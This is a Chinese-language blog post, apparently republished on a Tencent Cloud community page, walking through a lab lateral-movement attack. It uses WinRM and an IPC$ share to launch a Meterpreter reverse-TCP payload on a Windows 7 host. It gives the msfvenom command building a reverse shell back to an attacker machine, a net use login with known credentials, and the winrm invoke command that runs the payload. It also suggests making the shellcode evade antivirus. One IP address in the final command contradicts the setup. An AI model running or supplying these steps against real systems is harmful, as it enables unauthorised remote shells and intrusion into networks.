前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用WinRM实现内网无文件攻击反弹shell

利用WinRM实现内网无文件攻击反弹shell

作者头像
洛米唯熊
发布2019-08-29 15:13:39
1.2K0
发布2019-08-29 15:13:39
举报
文章被收录于专栏:洛米唯熊洛米唯熊

0x00:前言


WinRM是WindowsRemoteManagementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。这样一来,我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。

Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win7系统中却默认安装此WinRM服务,但是默认为禁用状态,Win8系统和Win10系统也都默认开启WinRM服务。

WinRM的好处在于,这种远程连接不容易被察觉到,也不会占用远程连接数!

0x01:环境准备


  1. WinRM会用到5985、5986 端口,所以防火墙必须做开放处理。
  2. 用Administrator账户登录攻击机器
  3. 前提知道被攻击方的用户登录账户密码
  4. Windows操作系统中,默认是开启共享IPC$的
  5. IP:192.168.124.30(server2016)

IP:192.168.124.20(win7)

IP:192.168.124.32(Kali)

0x02:攻击过程


一、快速在(server2016)运行winrm

命令:winrmquickconfig

二、netuse连接(win7)

命令:netuse \\192.168.124.20\ipc$ “密码”/user:“用户名

尝试调用本地”calc.exe”.

成功

三、在(win7)中需要被远程访问的文件,开启文件共享。

开启共享文件夹,并添加访问用户的权限,使其能够远程访问。

四、在(win7)中放置木马,并且用(kali)接收反弹的shell

1、生成shellcode

msfvenom -pwindows/x64/meterpreter_reverse_tcp lhost=192.168.124.32 lport=7777-f exe -o ./luomiweixiong.exe

2、把”luomiweixiong.exe”放在(win7)的C盘根目录。

3、kali启动监听shell模式

五、利用(server2016)的WinRM 实现内网无文件攻击反弹shell

1、在(server2016)中执行以下命令

winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.12.20\c\luomiweixiong.exe"}

反弹成功

0x03:视频演示


0x04:总结


  1. shellcode还可以做一些免杀处理,使其更加的完美。
  2. (有待大佬们再次总结)
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-08-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档